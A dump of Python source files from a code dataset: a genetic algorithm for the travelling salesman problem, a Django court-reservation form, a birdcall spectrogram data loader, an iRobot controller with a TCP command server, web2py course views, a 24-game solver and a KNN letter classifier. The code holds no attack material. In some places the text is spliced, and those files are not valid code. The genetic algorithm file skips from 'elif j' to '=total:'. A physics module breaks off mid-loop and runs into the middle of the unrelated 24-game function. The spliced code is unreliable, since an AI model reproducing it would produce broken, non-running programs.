hdf['sfluxc_n'].values])\n pfSouth = np.array([x.v for x in hdf['sfluxc_s'].values])\n normflux_n = pfNorth*maxarea/visarea_n\n normflux_s = pfSouth*maxarea/visarea_s\n plt.subplots_adjust(hspace = .40)\n pf1(carr[j])\n pf2(carr[j])\n j = j + 1\n\nplt.show()\n","sub_path":"PF_ALL_vs_date.py","file_name":"PF_ALL_vs_date.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"443381300","text":"#genetic algorithm\r\n#reading file\r\nfor k in range(50):\r\n import random\r\n f = open(\"NEWAISearchfile012.txt\",\"r\")\r\n contents = f.read()\r\n f.close()\r\n tour_size = 0\r\n dists = []\r\n edges = []\r\n numbers = [\"0\",\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\"]\r\n for i in contents.split(\",\"):\r\n dists.append(i.strip())\r\n dists[1] = dists[1].replace(\"SIZE = \",\"\")\r\n name = dists[0]\r\n del dists[0]\r\n size = int(dists[0])\r\n del dists[0]\r\n for i in range(len(dists)):\r\n if dists[i].isdigit() == False:\r\n for j in range(len(dists[i])):\r\n if dists[i][j] not in numbers:\r\n dists[i] = dists[i].replace(dists[i][j],\"\")\r\n point = -1\r\n for i in range(size):\r\n edges.append([])\r\n for j in range(size):\r\n if j==i:\r\n edges[i].append(0)\r\n elif i==0:\r\n point+=1\r\n edges[i].append(int(dists[point]))\r\n elif j=total:\r\n parents.append(tours[i])\r\n break\r\n else:\r\n total+=probs[i]\r\n offspring = []\r\n for i in range(int(pop_size/2)):\r\n num1 = random.randint(0,len(parents)-1)\r\n parent1 = parents[num1]\r\n del parents[num1]\r\n num2 = random.randint(0,len(parents)-1)\r\n parent2 = parents[num2]\r\n del parents[num2]\r\n cross = random.uniform(0,1)\r\n mutant = random.uniform(0,1)\r\n if cross 0:\n #\n # check that all terms are free\n #\n booked = Reservation.objects.book_weekly (from_date, \n until_date,\n commit=False,\n created_on=r.created_on,\n type=r.type,\n description=r.description,\n user=r.user,\n vacancy=r.vacancy)\n if new_res_count == len(booked):\n #\n # there is place for all reservations, save the to the DB\n #\n booked = Reservation.objects.book_weekly (from_date, \n until_date,\n commit=True,\n created_on=r.created_on,\n type=r.type,\n description=r.description,\n user=r.user,\n vacancy=r.vacancy)\n #\n # the repeating series identifier for the first reservation\n #\n r.repeat_series = booked[0].repeat_series\n else:\n #\n # not all terms are free\n #\n raise ValueError (_(\"No free terms for all reservations\"))\n #\n # don't forget to save the original instance\n #\n if commit:\n r.save ( )\n return r\n\n\n def clean (self):\n \"\"\"\n Checks that repeat_until is later than the first reservation date.\n If repeat weekly is on, the description should be given.-\n \"\"\"\n cleaned_data = self.cleaned_data\n is_repeat = cleaned_data.get ('repeat')\n from_date = cleaned_data.get ('for_date')\n until_date = cleaned_data.get ('repeat_until')\n description = cleaned_data.get ('description')\n \n if is_repeat:\n if from_date > until_date:\n raise forms.ValidationError (_('Please check the dates!'))\n if (len(description) == 0) or (description.isspace ( )):\n raise forms.ValidationError (_('This field is required'))\n return cleaned_data\n \n\nclass SelectDateForm (forms.Form):\n \"\"\"\n A form to select for which date to display reservations.-\n \"\"\"\n for_date = forms.DateField (initial=date.today ( ))\n \n \nclass SearchFreeCourtForm (forms.Form):\n \"\"\"\n A form to look for a free court and potentially make a reservation.-\n \"\"\"\n #\n # set up the dates drop-down\n #\n today = date.today ( )\n tomorrow = today + timedelta (days=1)\n DATES = [(today.toordinal ( ), _('Today')),\n (tomorrow.toordinal ( ), _('Tomorrow'))]\n for d in range (2, 7):\n day_offset = timedelta (days=d)\n day = today + day_offset\n DATES.append ((day.toordinal ( ), \n date.strftime (day,\n locale.nl_langinfo (locale.D_FMT))))\n #\n # set up the times drop-down\n #\n TIMES = [('XX', _('-- anytime --')),\n ('AM', _('Morning')),\n ('PM', _('Afternoon')),\n ('EV', _('Evening'))]\n for k,v in Vacancy.HOURS[:-1]:\n TIMES.append ((str(k), v))\n #\n # set up the reservation length drop-down\n # \n HOURS = ((1, _('1 hour')),\n (2, _('2 hours')),\n (3, _('3 hours')))\n \n location = ModelChoiceField (queryset=City.objects.all ( ).order_by ('name'),\n empty_label=_('-- anywhere --'),\n required=False)\n for_date = ChoiceField (choices=DATES,\n initial=today)\n for_time = ChoiceField (choices=TIMES,\n initial='XX')\n hours = ChoiceField (choices=HOURS,\n initial=1)\n \n","sub_path":"reservations/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":7754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"398427323","text":"from __future__ import division\nimport numpy as np\nimport librosa \nimport csv\nimport os\nimport glob\nimport warnings\nimport multiprocessing\nimport sys\nimport random\nimport copy\nimport time\nimport tensorflow as tf\n\nwarnings.filterwarnings('ignore')\n\nclass Dataset(object):\n \"\"\"Implements the dataset properties\n \"\"\"\n\n def __init__(self,path=\"\",is_training_set=True):\n\n #Paths\n self.is_training_set = is_training_set\n self.path = path\n self.train_audio_path = os.path.join(path,\"train_audio\")\n self.train_csv_path = os.path.join(path,\"train.csv\")\n self.train_dict = self.csv_to_dict(self.train_csv_path)\n #Path of \"false\" audio samples\n self.false_audio_path = os.path.join(path,\"false_audio\")\n #Path to test audio\n self.test_audio_path = os.path.join(path,\"example_test_audio\")\n self.test_csv_path = os.path.join(path,\"test.csv\")\n self.test_dict = self.csv_to_dict(self.test_csv_path)\n self.test_meta_path = os.path.join(path,\"example_test_audio_metadata.csv\")\n self.test_dict = self.csv_to_dict(self.test_meta_path,self.test_dict)\n self.test_summary_path = os.path.join(path,\"example_test_audio_summary.csv\")\n self.test_dict = self.csv_to_dict(self.test_summary_path,self.test_dict)\n self.prepare()\n \n def csv_to_dict(self,path,data_dict = None):\n if data_dict == None:\n data_dict = {}\n with open(path, mode='r') as infile:\n reader = csv.reader(infile)\n first_row = True\n for rows in reader:\n if first_row:\n col_names = rows\n first_row = False\n for name in col_names:\n data_dict[name] = []\n col_ct = 0\n for name in col_names:\n data_dict[name].append(rows[col_ct])\n col_ct += 1\n return data_dict\n \n\n def prepare(self):\n \"\"\"Prepares the Dataset class for use.\n \"\"\"\n if self.is_training_set:\n #Prepare train samples \n \n #Create bird mapping name->int\n if not(os.path.isfile(os.path.join(self.path,\"bird_dict.npy\"))):\n all_birds = self.train_dict['ebird_code']\n self.unique_birds_ebird_codes = np.unique(all_birds)\n self.bird_dict ={}\n bird_id = 0 \n for ebird_code in self.unique_birds_ebird_codes:\n self.bird_dict[ebird_code] = bird_id\n bird_id += 1\n \n \n np.save(os.path.join(self.path,\"bird_dict.npy\"),self.bird_dict)\n else:\n self.bird_dict = np.load(os.path.join(self.path,\"bird_dict.npy\"),allow_pickle=True).item()\n \n self.n_classes = len(self.bird_dict.keys())\n \n self.train_samples = []\n mp3_filenames = glob.glob(self.train_audio_path + \"/**/*\", \n recursive = True)\n for i_row in range(1,len(self.train_dict['filename'])):\n sample = {}\n for key in self.train_dict:\n if len(self.train_dict[key])>i_row:\n if key == 'filename':\n search_name = self.train_dict[key][i_row]\n for name in mp3_filenames:\n if search_name in name:\n sample[key] = name\n break\n elif key == 'ebird_code':\n sample['bird_id'] = self.bird_dict[self.train_dict[key][i_row]]\n else:\n sample[key] = self.train_dict[key][i_row]\n else:\n sample[key] = None\n \n \n self.train_samples.append(sample)\n self.n_samples = len(self.train_samples)\n \n else:\n #Prepare test samples\n self.test_samples = []\n try:\n self.bird_dict = np.load(os.path.join(self.path,\"bird_dict.npy\"),allow_pickle=True).item()\n except:\n raise(\"Run first with training set to create bird mapping!\")\n \n mp3_filenames = glob.glob(self.test_audio_path + \"/**/*\", \n recursive = True)\n for i_row in range(1,len(self.test_dict['filename'])):\n sample = {}\n for key in self.test_dict:\n if len(self.test_dict[key])>i_row:\n if key == 'filename':\n search_name = self.test_dict[key][i_row]\n for name in mp3_filenames:\n if search_name in name:\n sample[key] = name\n break\n else:\n sample[key] = self.test_dict[key][i_row]\n else:\n sample[key] = None\n \n self.test_samples.append(sample)\n self.n_samples = len(self.test_samples)\n \nclass DataGenerator(object):\n def __init__(self,dataset,augmentation,\n shuffle = True,\n is_training = True,\n is_validation = False,\n force_feature_recalc = False,\n preload_false_samples = True,\n preload_samples = False,\n training_percentage = 90,\n save_created_features = True,\n max_time = 5,\n max_samples_per_audio = 6,\n n_fft = 2048,\n hop_length = 512,\n sampling_rate = 22050):\n self.dataset = dataset\n #Shuffle files before loading since dataset is ordered by class\n if shuffle:\n random.seed(4)\n random.shuffle(self.dataset.train_samples)\n \n self.n_training_samples = int(dataset.n_samples*training_percentage/100)\n self.n_validation_samples = dataset.n_samples-self.n_training_samples\n self.augmentation = augmentation\n self.is_training = is_training\n self.is_validation = is_validation\n self.sampling_rate = sampling_rate\n self.n_fft = n_fft\n self.preload_samples = preload_samples\n self.preload_false_samples = preload_false_samples\n self.hop_length = hop_length\n self.max_time = max_time\n self.max_samples_per_audio = max_samples_per_audio\n self.force_feature_recalc = force_feature_recalc\n self.save_created_features = save_created_features\n if self.is_training:\n self.first_sample = 0\n self.last_sample = self.n_training_samples\n elif self.is_validation:\n self.first_sample = self.n_training_samples\n self.last_sample = self.dataset.n_samples\n #Get paths of false samples\n false_samples_mono = glob.glob(self.dataset.false_audio_path+ \"/mono/*.npz\", \n recursive = True)\n \n false_samples_stereo = glob.glob(self.dataset.false_audio_path+ \"/stereo/*.npz\", \n recursive = True)\n \n self.false_sample_paths = false_samples_mono + false_samples_stereo\n #Pre load false samples\n if self.preload_false_samples:\n self.preloaded_false_samples = {}\n for path in self.false_sample_paths:\n with np.load(path,allow_pickle=True) as sample_file:\n self.preloaded_false_samples[path] = sample_file.f.arr_0\n print(\"Finished pre-loading false samples!\")\n \n \n if self.is_training or self.is_validation:\n self.samples = self.dataset.train_samples[self.first_sample:self.last_sample]\n else:\n self.samples = self.dataset.test_samples\n #Pre load samples (takes a lot of RAM ~130 GB)\n try:\n if self.preload_samples:\n self.preloaded_samples = {}\n for sample in self.samples:\n path = sample[\"filename\"].replace(\"mp3\",\"npz\")\n with np.load(path,allow_pickle=True) as sample_file:\n self.preloaded_samples[path] = sample_file.f.arr_0\n print(\"Finished pre-loading samples\")\n except:\n self.preload_samples = False\n\n def do_stft(self,y,channels):\n spectra = []\n #STFT for all channels\n for channel in range(channels):\n spectrum = np.abs(librosa.core.stft(y[channel,:],\n n_fft = self.n_fft,\n hop_length = self.hop_length,\n window = 'hann', \n center = True))\n spectrum = np.asarray(spectrum,dtype=np.float32)\n spectra.append(spectrum)\n spectra = np.stack(spectra,axis=0)\n return spectra\n \n def pad_sample(self,spectrum,x_size=np.ceil(5*22050/512)):\n diff = int(x_size) - spectrum.shape[-1]\n if diff == 0:\n return spectrum\n if diff > spectrum.shape[-1]:\n while spectrum.shape[-1] < x_size:\n spectrum = np.concatenate([spectrum,spectrum],axis=-1)\n \n spectrum = spectrum[:,:,:int(x_size)]\n else:\n #First element is often zero. To avoid jump skip first element\n if diff+1 < spectrum.shape[-1]:\n spectrum = np.concatenate([spectrum,spectrum[:,:,1:diff+1]],axis=-1)\n else:\n spectrum = np.concatenate([spectrum,spectrum[:,:,:diff]],axis=-1)\n\n return spectrum\n \n def create_feature(self,sample):\n \"\"\"Creates the features by doing a STFT\"\"\"\n\n filename = sample['filename']\n channels_str = sample['channels']\n channels = int(channels_str.split(\" \")[0])\n if channels == 1:\n mono = True\n else:\n mono = False\n y, sr = librosa.core.load(filename,mono=mono,sr=self.sampling_rate)\n \n y,_ = librosa.effects.trim(y)\n if mono == True:\n y = np.expand_dims(y,0)\n\n duration = y.shape[-1]/self.sampling_rate\n n_samples = int(np.ceil(duration/self.max_time))\n n_samples = min(n_samples,self.max_samples_per_audio)\n spectra = {}\n for i_sample in range(n_samples):\n start = i_sample*int(self.sampling_rate*self.max_time)\n end = (i_sample+1)*int(self.sampling_rate*self.max_time)\n end = min(end,y.shape[-1])\n y_sample = y[:,start:end]\n if y_sample.shape[-1] == 1:\n break\n #Transform audio\n spectrum = self.do_stft(y_sample,channels)\n #Pad spectrum\n spectrum = self.pad_sample(spectrum,\n x_size=np.ceil(self.max_time*self.sampling_rate/self.hop_length))\n spectra[str(i_sample)] = spectrum\n \n if self.save_created_features:\n if \"mp3\" in filename:\n np.savez(filename.replace(\"mp3\",\"npz\"),spectra)\n else:\n np.savez(filename.replace(\"wav\",\"npz\"),spectra)\n\n return spectra\n \n def create_all_features(self):\n if self.is_training:\n samples = self.dataset.train_samples\n else:\n samples = self.dataset.test_samples\n\n n = len(samples)\n\n ct = 0 \n for sample in samples:\n spectra = self.create_feature(sample)\n if np.any(spectra) == None:\n print(sample[\"filename\"]+\" failed!\")\n else:\n print(\"Calculated \"+str(ct/n*100)+\"% of samples...\")\n\n ct += 1 \n \n def create_all_features_multi_cpu(self):\n \n if self.is_training:\n all_samples = self.dataset.train_samples\n else:\n all_samples = self.dataset.test_samples\n \n samples = []\n for sample in all_samples:\n filename = sample['filename']\n if not(os.path.isfile(filename.replace(\"mp3\",\"npz\"))) or self.force_feature_recalc:\n samples.append(sample)\n \n print(str(len(all_samples)-len(samples))+\" feature samples already exist\")\n \n n = len(samples)\n \n pool = multiprocessing.Pool(os.cpu_count())\n for i, _ in enumerate(pool.imap_unordered(self.create_feature, samples), 1):\n sys.stderr.write('\\rdone {0:%}'.format(max(0,i/n)))\n \n def create_false_features_multi_cpu(self):\n \n \n filenames_mono = glob.glob(self.dataset.false_audio_path+ \"/mono/*.wav\", \n recursive = True)\n \n filenames_stereo = glob.glob(self.dataset.false_audio_path+ \"/stereo/*.wav\", \n recursive = True)\n\n samples = []\n\n for filename in filenames_mono:\n if not(os.path.isfile(filename.replace(\"wav\",\"npz\"))) or self.force_feature_recalc:\n samples.append({'filename':filename,'channels':'1 mono'})\n\n\n for filename in filenames_stereo:\n if not(os.path.isfile(filename.replace(\"wav\",\"npz\"))) or self.force_feature_recalc:\n samples.append({'filename':filename,'channels':'2 stereo'})\n \n print(str(len(filenames_mono)+len(filenames_stereo)-len(samples))+\" feature samples already exist\")\n \n n = len(samples)\n\n pool = multiprocessing.Pool(os.cpu_count())\n for i, _ in enumerate(pool.imap_unordered(self.create_feature, samples), 1):\n sys.stderr.write('\\rdone {0:%}'.format(max(0,i/n)))\n \n def generate_all_samples_from_scratch(self):\n stft_len = int(np.ceil(self.max_time*self.sampling_rate/self.hop_length))\n\n for sample in self.samples:\n\n filename = sample['filename']\n #Create features via STFT if no file exists\n spectra = self.create_feature(sample)\n \n for spec_key in spectra.keys():\n #Check for None type\n spectrum = spectra[spec_key]\n if np.any(spectrum) == None or spectrum.shape[-1] != stft_len:\n continue\n \n #If only mono --> duplicate\n if spectrum.shape[0] == 1:\n spectrum = np.tile(spectra[spec_key],[2,1,1])\n \n #Transpose spectrogramms for \"channels_last\"\n spectrum = tf.transpose(spectrum,perm=[1,2,0])\n \n #Fill false spectra with zero\n false_spectrum = tf.zeros_like(spectrum)\n \n if self.is_training or self.is_validation:\n label = tf.one_hot(sample['bird_id'],self.dataset.n_classes+1)\n else:\n label = None\n\n sub_sample = {'input_features':spectrum,\n 'labels':label,\n 'false_sample':false_spectrum}\n \n if self.augmentation != None:\n yield self.augmentation(sub_sample,self.is_training)\n else:\n yield sample\n \n def generate(self):\n \n \n stft_len = int(np.ceil(self.max_time*self.sampling_rate/self.hop_length))\n\n for sample in self.samples:\n\n filename = sample['filename']\n #If feature was already created load from file\n if os.path.isfile(filename.replace(\"mp3\",\"npz\")) and not(self.force_feature_recalc):\n if self.preload_samples:\n spectra_npz = self.preloaded_samples[filename.replace(\"mp3\",\"npz\")]\n else:\n with np.load(filename.replace(\"mp3\",\"npz\"),allow_pickle=True) as sample_file:\n spectra_npz = sample_file.f.arr_0\n \n spec_keys = spectra_npz.item().keys()\n spec_keys = list(spec_keys)\n rnd_key = spec_keys[np.random.randint(0,len(spec_keys))]\n spectra = spectra_npz.item()[rnd_key]\n else:\n #Create features via STFT if no file exists\n spectra = self.create_feature(sample)\n spec_keys = spectra.keys()\n spec_keys = list(spec_keys)\n rnd_key = spec_keys[np.random.randint(0,len(spec_keys))]\n spectra = spectra[rnd_key]\n\n #Check for None type\n if np.any(spectra) == None or spectra.shape[-1] != stft_len:\n continue\n \n #Get false sample\n rnd_false_sample = random.choice(self.false_sample_paths)\n\n if self.preload_false_samples:\n false_spectra_npz = self.preloaded_false_samples[rnd_false_sample]\n else:\n with np.load(rnd_false_sample,allow_pickle=True) as sample_file:\n false_spectra_npz = sample_file.f.arr_0\n \n false_spec_keys = false_spectra_npz.item().keys()\n false_spec_keys = list(false_spec_keys)\n false_rnd_key = false_spec_keys[np.random.randint(0,len(false_spec_keys))]\n false_spectra = false_spectra_npz.item()[false_rnd_key]\n\n #If only mono --> duplicate\n if spectra.shape[0] == 1:\n spectra = np.tile(spectra,[2,1,1])\n \n \n #If false only mono --> duplicate\n if false_spectra.shape[0] == 1:\n false_spectra = np.tile(false_spectra,[2,1,1])\n\n #Transpose spectrogramms for \"channels_last\"\n spectra = tf.transpose(spectra,perm=[1,2,0])\n false_spectra = tf.transpose(false_spectra,perm=[1,2,0])\n\n sample = {'input_features':spectra,\n 'labels':tf.one_hot(sample['bird_id'],self.dataset.n_classes+1),\n 'false_sample':false_spectra}\n if self.augmentation != None:\n yield self.augmentation(sample,self.is_training)\n else:\n yield sample\n\nif __name__ == \"__main__\":\n ds = Dataset(\"/srv/TUG/datasets/cornell_birdcall_recognition\")\n dg = DataGenerator(ds,None,force_feature_recalc=True)\n dg.create_all_features_multi_cpu()\n","sub_path":"src/utils/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":18682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"48159224","text":"from pyrobot import *\nimport sys\nimport logging\nimport time\nimport SocketServer\nimport Queue\nimport threading\n\nBUFFER_SIZE = 1024\nCOMMANDS = []\nACK = \"ACK\\n\"\nCONFIG_CMD = \"__cfg_\"\nq = Queue.Queue()\np = Queue.Queue()\n\nclass RobotController(threading.Thread):\n def __init__(self, robot):\n threading.Thread.__init__(self)\n self.rtbot = robot\n def run(self):\n currentCommand = ''\n while currentCommand != \"quit\":\n currentCommand = q.get()\n if currentCommand == \"forward\":\n self.rtbot.DriveStraight(200)\n elif currentCommand == \"reverse\":\n self.rtbot.DriveStraight(-200)\n elif currentCommand == \"left\":\n self.rtbot.TurnInPlace(200, \"ccw\")\n elif currentCommand == \"right\":\n self.rtbot.TurnInPlace(200, \"cw\")\n elif currentCommand == \"stop\":\n self.rtbot.Stop()\n self.rtbot.Stop()\n\n\nclass TCPHandler(SocketServer.BaseRequestHandler):\n def handle(self):\n self.data = self.request.recv(1024).strip()\n q.put(self.data)\n if self.data == \"quit\":\n p.put(self.data)\n\n\nclass safetyController(threading.Thread):\n def __init__(self, robot):\n threading.Thread.__init__(self)\n self.rtbot = robot\n def run(self):\n while True:\n if not p.empty():\n break\n try:\n self.rtbot.sensors.GetAll()\n except PyRobotError:\n pass\n bump = self.rtbot.sensors.GetBump()\n cliff = self.rtbot.sensors.data['cliff-front-right'] or \\\n self.rtbot.sensors.data['cliff-front-left'] or \\\n self.rtbot.sensors.data['cliff-right'] or \\\n self.rtbot.sensors.data['cliff-left']\n wheelDrop = self.rtbot.sensors.data['wheel-drop-left'] or \\\n self.rtbot.sensors.data['wheel-drop-right']\n analogInput = self.rtbot.sensors.GetAnalogInput()\n\n if wheelDrop:\n q.put(\"quit\")\n break\n\n if bump: \n self.rtbot.DriveDistance(-200, 100) \n\n if cliff:\n self.rtbot.DriveDistance(-200, 100)\n\n if analogInput < 30:\n self.rtbot.DriveDistance(-200, 100)\n \n#=============================================================\n# define the Rtbot class to init and start itself\nclass Rtbot(Create):\n def __init__(self, tty='/dev/ttyUSB0'):\n super(Create, self).__init__(tty)\n self.sci.AddOpcodes(CREATE_OPCODES)\n self.sensors = CreateSensors(self)\n self.safe = False # Use full mode for control.\n\n def start(self):\n logging.debug('Starting up the Rtbot.')\n self.SoftReset()\n self.Control()\n\n def DriveDistance(self, velocity, distance):\n self.sensors.GetDistance()\n self.DriveStraight(velocity)\n dist = 0\n while(abs(dist) < distance):\n dist += self.sensors.GetDistance()\n self.Stop()\n\n def TurnAngle(self, velocity, degree, direction):\n self.sensors.GetAngle()\n self.TurnInPlace(velocity, direction)\n angle = 0\n while(abs(angle) < degree):\n angle += self.sensors.GetAngle()\n self.Stop()\n\n#=============================================================\n#place further functions in the Rtbot class e.x.\n# def somefunction(some_argvs):\n# some code\n\n\n# To implement a service, you must derive a class from BaseRequestHandler and redefine its handle() method\n\n\n#subclass of threading.Thread\n#override the run() method in a subclass\t\n \t\t\t\n \t\t\n","sub_path":"rts/lab3/robot/rtbot.py","file_name":"rtbot.py","file_ext":"py","file_size_in_byte":3685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"2611388","text":"import numpy as np\nimport sys\nfrom pylab import *\nfrom math import *\nimport tsase\nimport ase\nfrom basin import *\nimport scipy\nimport time\n\nclass BCM():\n @classmethod\n def mag(cls,vec):\n return sqrt(dot(vec,vec))\n\n @classmethod\n def q_avg(cls,l,m,positions,cm):\n sum = complex(0,0)\n bonds = 0\n for a in range(len(positions)):\n b = a+1\n while b i) or (op == truediv and nums[j] == 0):\n continue\n next_nums.append(op(nums[i], nums[j]))\n if judge_point_24(next_nums):\n return True\n next_nums.pop()\n return False\n\n\nif __name__ == '__main__':\n filename = 'game' + '.txt'\n\n f = open(filename, 'r') # utf8 gb2312\n\n reader = f.readlines()\n\n for item in reader:\n item = item.rstrip()\n row = item.split(',')\n\n n = list()\n for i in row:\n n.append(int(i))\n\n # n = [1,2,1,2]\n # print(row)\n if judge_point_24(n):\n print('true')\n else:\n print('false')\n\n\n\n","sub_path":"contest/part1/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"487287769","text":"from django.http import Http404\nfrom django.shortcuts import render\nfrom categories.models import Category\n\n# Create your views here.\nfrom product.models import Product\n\n\ndef index(request):\n categories = Category.objects.filter(parent_category__isnull=True)\n\n special_deals = Product.objects.filter(is_active=True, is_promotion=True)\n\n return render(request, 'app/index.html', {\n 'categories': categories,\n 'special_deals': special_deals\n })\n\n\ndef product_single(request, slug):\n try:\n product = Product.objects.get(slug=slug, is_active=True)\n except Product.DoesNotExist:\n raise Http404\n\n return render(request, 'app/product-single.html', locals())\n","sub_path":"product/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"564013455","text":"# -*- coding: utf-8 -*-\n# this file is released under public domain and you can use without limitations\n\n#########################################################################\n## This is a sample controller\n## - index is the default action of any application\n## - user is required for authentication and authorization\n## - download is for downloading files uploaded in the db (does streaming)\n#########################################################################\nimport itertools\n\ndef index():\n \"\"\"\n example action using the internationalization operator T and flash\n rendered by views/default/index.html or views/generic.html\n\n if you need a simple wiki simply replace the two lines below with:\n return auth.wiki()\n \"\"\"\n response.flash = T(\"Hello World\")\n return dict(message=T('Welcome to web2py!'))\n\n\ndef user():\n \"\"\"\n exposes:\n http://..../[app]/default/user/login\n http://..../[app]/default/user/logout\n http://..../[app]/default/user/register\n http://..../[app]/default/user/profile\n http://..../[app]/default/user/retrieve_password\n http://..../[app]/default/user/change_password\n http://..../[app]/default/user/manage_users (requires membership in\n use @auth.requires_login()\n @auth.requires_membership('group name')\n @auth.requires_permission('read','table name',record_id)\n to decorate functions that need access control\n \"\"\"\n return dict(form=auth())\n\n\n@cache.action()\ndef download():\n \"\"\"\n allows downloading of uploaded files\n http://..../[app]/default/download/[filename]\n \"\"\"\n return response.download(request, db)\n\n\ndef call():\n \"\"\"\n exposes services. for example:\n http://..../[app]/default/call/jsonrpc\n decorate with @services.jsonrpc the functions to expose\n supports xml, json, xmlrpc, jsonrpc, amfrpc, rss, csv\n \"\"\"\n return service()\n\n##################################################################################\n#### ####\n#### COURSE PAGES ####\n#### ####\n##################################################################################\n\ndef courses():\n courses = db(Course).select()\n return dict(courses=courses)\n\ndef course():\n course_id = int(request.args(0))\n course = db(Course.id == course_id).select().first()\n open_classes = course.classes(Class.status == 3).select()\n \n Interest.course.default = course_id\n Interest.course.readable = Interest.course.writable = False\n interest_form = SQLFORM(Interest)\n if interest_form.process(onvalidation=check_if_exists).accepted:\n response.flash = T(\"Thank you!\")\n elif interest_form.errors:\n response.flash = T(\"Erros no formulário!\")\n \n return dict(\n course=course,\n open_classes=open_classes,\n interest_form=interest_form)\n\n@auth.requires_login()\ndef enroll():\n class_id = int(request.args(0))\n if not class_id:\n session.flash = T(\"No class selected!\")\n redirect(URL('courses'))\n \n Student.insert(student=auth.user.id, class_id=class_id, status=1)\n session.flash = T(\"Congrats! You're enrolled on a new course!\") \n redirect(URL('my_courses'))\n\n@auth.requires_login()\ndef my_courses():\n class_ids = db(Student.student == auth.user.id).select(Student.class_id)\n classes = db(Class.id.belongs([x.class_id for x in class_ids])).select()\n return dict(classes=classes)\n\n@auth.requires_login()\ndef my_class():\n try:\n class_id = int(request.args(0))\n except:\n redirect(URL('index'))\n my_class = db(Class.id == class_id).select().first()\n modules = db(Module.class_id == class_id).select()\n return dict(my_class=my_class, \n modules=modules)\n\n@auth.requires_login()\ndef module():\n try:\n mod_id = int(request.args(0))\n except:\n redirect(URL('index'))\n module = db(Module.id == mod_id).select().first()\n lessons = db(Lesson.lesson_module == module.id).select(orderby=Lesson.place)\n return dict(module=module,\n lessons=lessons)\n\n@auth.requires_login()\ndef lesson():\n try:\n lesson_id = int(request.args(0))\n except:\n redirect(URL('index'))\n lesson = db(Lesson.id == lesson_id).select().first()\n videos = lesson.videos.select()\n texts = lesson.texts.select()\n exercises = lesson.exercises.select()\n\n merged_records = itertools.chain(videos, texts, exercises)\n contents = sorted(merged_records, key=lambda record: record['place'])\n\n is_correct = {}\n if request.vars:\n keys = request.vars.keys()\n for key in keys:\n q_id = int(key.split('_')[1])\n question = db(Exercise.id==q_id).select().first()\n if question.correct == int(request.vars[key]):\n is_correct[key] = True\n else:\n is_correct[key] = False\n return dict(lesson=lesson,\n contents=contents,\n is_correct=is_correct)\n\n@auth.requires_login()\ndef forum():\n try:\n class_id = int(request.args(0))\n except:\n redirect(URL('index'))\n topics = db(Forum.class_id == class_id).select()\n return dict(topics=topics)\n\n@auth.requires_login()\ndef topic():\n try:\n topic_id = int(request.args(0))\n except:\n redirect(URL('index'))\n topic = db(Forum.id == topic_id).select().first()\n comments = db(Comment.post == topic_id).select()\n\n Comment.author.default = auth.user.id\n Comment.author.readable = Comment.author.writable = False\n Comment.post.default = topic_id\n Comment.post.readable = Comment.post.writable = False\n form = crud.create(Comment, next=URL('topic', args=topic_id))\n\n return dict(topic=topic,\n comments=comments,\n form=form)\n\n@auth.requires_login()\ndef new_topic():\n try:\n class_id = int(request.args(0))\n except:\n redirect(URL('index'))\n Forum.author.default = auth.user.id\n Forum.author.readable = Forum.author.writable = False\n Forum.class_id.default = class_id\n Forum.class_id.readable = Forum.class_id.writable = False\n form = crud.create(Forum, next=URL('topic', args='[id]'))\n return dict(form=form)\n\n@auth.requires_login()\ndef calendar():\n try:\n class_id = int(request.args(0))\n except:\n redirect(URL('index'))\n dates = db((Date.class_id == class_id)|(Date.class_id == None)).select()\n my_class = db(Class.id == class_id).select().first()\n modules = db(Module.class_id == class_id).select()\n lessons = []\n for module in modules:\n for lesson in module.lessons.select():\n lessons.append(lesson)\n return dict(dates=dates,\n my_class=my_class,\n lessons=lessons)","sub_path":"controllers/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":6906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"475417601","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wen Oct 3 2018\n@author: Purkialo\n\"\"\"\nimport numpy as np\n\nK_num = 20\n\ndef calcu(input,dataset):\n dist = []\n for i in range(length_train):\n dist.append(np.linalg.norm(input - dataset[i]))\n dist = np.array(dist,dtype = float).reshape(length_train,1)\n dist = np.hstack((dataname.reshape(length,1)[:length_train],dist))\n dist = np.array(sorted(dist,key = lambda result:float(result[1])))\n return dist\n\ndef count(input):\n key = np.unique(input[:,0])\n result = {}\n for k in key:\n mask = (input == k)\n arr_new = input[mask]\n v = arr_new.size\n result[k] = v\n result = sorted(result.items(),key=lambda result:result[1],reverse=True) \n return result\n\nif __name__ == '__main__':\n data = []\n name = []\n\n with open(\"letter-recognition.data\") as file:\n for line in file:\n data.append(line.strip().split(',')[1:])\n name.append(line.strip().split(',')[0])\n length = len(name)\n dataset = np.array(data,dtype=int)\n dataname = np.array(name)\n length_train = int(0.95 * length)\n length_test = length - length_train\n testset = dataset[length_train:]\n testset = dataset[length_train:].reshape(length_test,16)\n testname = dataname[length_train:].reshape(length_test,1)\n flag_r = 0\n flag_w = 0\n for i in range(length_test):\n result = calcu(testset[i],dataset)\n dic = count(result[0:K_num])\n if(dic[0][0] != testname[i][0]):\n print(dic[:3])\n flag_w = flag_w + 1\n print(\"Predicted letter: %s, actually: %s, it's wrong!\" % (str(dic[0][0]),str(testname[i][0])))\n else:\n flag_r = flag_r + 1\n print(\"Predicted letter: %s, actually: %s, it's right!\" % (str(dic[0][0]),str(testname[i][0])))\n print(\"Accuracy: \",flag_r/(flag_r + flag_w))","sub_path":"Homework/Data Analysis 